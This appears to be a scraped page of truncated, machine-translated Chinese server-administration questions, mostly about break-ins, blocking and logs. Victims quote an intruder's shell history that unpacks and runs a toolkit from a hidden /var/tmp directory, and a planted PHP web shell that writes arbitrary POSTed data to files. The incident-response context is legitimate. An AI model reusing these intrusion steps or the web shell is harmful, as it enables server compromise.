我在Ubuntu 10.04.3服务器上的一个用户帐户被黑了,我不知道如何。 密码很强。 一个cronjob被安装在我的用户的crontab中,并运行在/var/tmp/.aw中 /var/tmp/.aw目录包含一个可执行文件集合,其中包括一个名为bash的文件。 我检查了我的〜/ .bash_history,发现了一些非常可疑的东西。 我在下面提供相关的片段。 w ls passwd cd /var/tmp w ls wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe w wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe w cat /prooc/cpuinfo cat /proc/cpuinfo exotr wq w exit w ls passwd cd /var/tmp ls wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe ls tar xzvf IPmech.tgz rm -rf IPmech.tgz cd .aw s ls ./autorun chmod +x * ./autorun ./start TKLL […]
一个横幅如何抓取DNS? 我能够横幅抓住其他服务,如HTTP / FTP / SMTP,但对于DNS,它不是一目了然的。 通常对于HTTP,我使用nc和HEAD / HTTP/1.1 {ENTER}{ENTER} 。 我以为如果知道查询的初始结构,就可以用DNS,但似乎找不到这方面的文档。
我的服务器最近由于Joomla和allow_url_fopen = ON而受到了攻击。我在服务器的根目录中看到有这个内容的各种php文件 Restricted accoss <?php error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); $file = "".$_POST["path"]; $fh = fopen ($file, 'w') or die(""); echo fwrite ($fh, stripslashes($_POST["raw_data"])); fclose($fh); 所以我closures了allow_url_fopen并删除了所有这些文件。 现在,我的网站在几分钟内运行正常,但是它会每隔几秒钟向这个地址发出请求,并在error_log中给出这个消息 [Thu Mar 07 00:14:00 2013] [error] [client 74.125.185.16] File does not exist: /var/www/html/index.xml 这我在access_log中看到很多时间 74.125.179.86 – – [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 […]
在我的一个网站上,我logging了对服务器所做的所有url请求。 我将这些数据logging下来以改进网站。 日志看起来像 http://example.com/search 2016-01-12 23:03:09 http://example.com/post/1234 2016-01-12 23:03:12 ………. 所以,这看起来很正常。 我现在在日志中发现了一些对我没有意义的东西,我有几百个具有不同域的条目 http://dhg.example.org/httptest.php 2016-01-10 20:12:15 在过去,我有一些类似的,我的域名或服务器的IP地址 http://example.com/httptest.php http://192.0.123.12/httptest.php 我想知道这是怎么可能的要求,我的服务器有这个url,而不是我的网站的url或服务器IP。 我应该担心吗? 这是对我的服务器的某种types的攻击? 编辑 具体来说,服务器上运行的应用程序正在logging这些URL,而不是服务器本身。 所以在每个页面请求我的脚本logging$_SERVER数组中的URL
我正在印度访问,看到他们的主要提供商Airtel将互联网的整体限制在一小撮自己的广告挂满网站,以及恼人的redirect。 我想为印度人民提供一个简单易行的途径来获得言论自由和信息自由。 因此,迄今为止,我已经将DNSlogging更新到了Google的公共DNS,这使我可以ping,dnslookup和curl网站,例如“askubuntu.com”,否则这些网站在印度被Airtel封锁。 但是,如果我通过浏览器(所有的插件卸载,并重新安装的浏览器)去他们,我仍然阻止访问大部分的互联网。 有谁知道我能做些什么来绕过DNS的黑客攻击? 一个VPN工作正常,但我认为能够独立于第三方连接某些东西会更实用。 我正在使用Windows,但也对Unix解决scheme感兴趣。 干杯!
我是一名SQL Server数据库pipe理员,最近被赋予了一个Oracle环境的责任。 (11克) 现在我在SQL Server上定时备份我的事务日志,然后将它们迁移到不同的服务器。 我也想用Oracle来做到这一点。 Oracle的重做日志在切换之前似乎基于大小,并允许服务器将其归档。 有人可以提供一些技巧/最佳实践如何实现这一点。 我也很感激任何关于调整重做日志大小以及如何处理白天使用模式变化的build议。 我忘了说这是在Redhat 5 Enterprise服务器上
我正在检查任何服务的状态或停止启动我的Linux服务器上的任何服务器时出现以下错误。 它的CentOS-5.4服务器。 sh: /usr/bin/(swapd): /lib/ld-linux.so.1: bad ELF interpreter: No such file or directory 我已经检查过ls -l / lib / ld *,下面是o / p -rwxr-xr-x 1 root root 129832 Oct 25 19:16 ld-2.5.so lrwxrwxrwx 1 root root 9 Nov 24 02:14 ld-linux.so.2 -> ld-2.5.so lrwxrwxrwx 1 root root 13 Nov 24 02:14 ld-lsb.so.3 -> ld-linux.so.2
我有一个网站。 有人正在发送成千上万的404点击到我的网站。 他使用随机IP。 他每天至less发送超过1000个点击到不存在于我的网站的各种url。 我每天都得到成千上万的404次点击。 请指导我如何处理这个问题。 如果您有任何问题,请告诉我。 谢谢
最近我们注意到,黑客正在试图破解我们的服务器,我们的服务器上安装了IP阻塞软件,但事实是,黑客正在使用dynamicIP地址尝试一次又一次…但我们可以看到他使用相同的机器攻击(日志文件显示不同的IP地址,但相同的机器名称如“身份validation失败(ylmf-pc)”),是否有可能通过机器名称阻止他? 我们正在使用CSF http://configserver.com/cp/csf.html 注意:我不是服务器的人,我是程序员
我正在部署一些VPS,当然,安全是一个大问题。 我读了IPtables白名单是保护你的机器的最好方法。 所以我build立了以下的方法: echo "Flushing rules" iptables -F echo "Allow localhost interface" iptables -A INPUT -i lo -j ACCEPT echo "Allow local network traffic" iptables -A INPUT -s 192.168.1.0/255.255.255.0 -j ACCEPT echo "Allow my dear friend 1" iptables -A INPUT -s xx.xx.xx.xx -j ACCEPT echo "Allow my dear friend 2" iptables -A INPUT -s xx.xx.xx.xx […]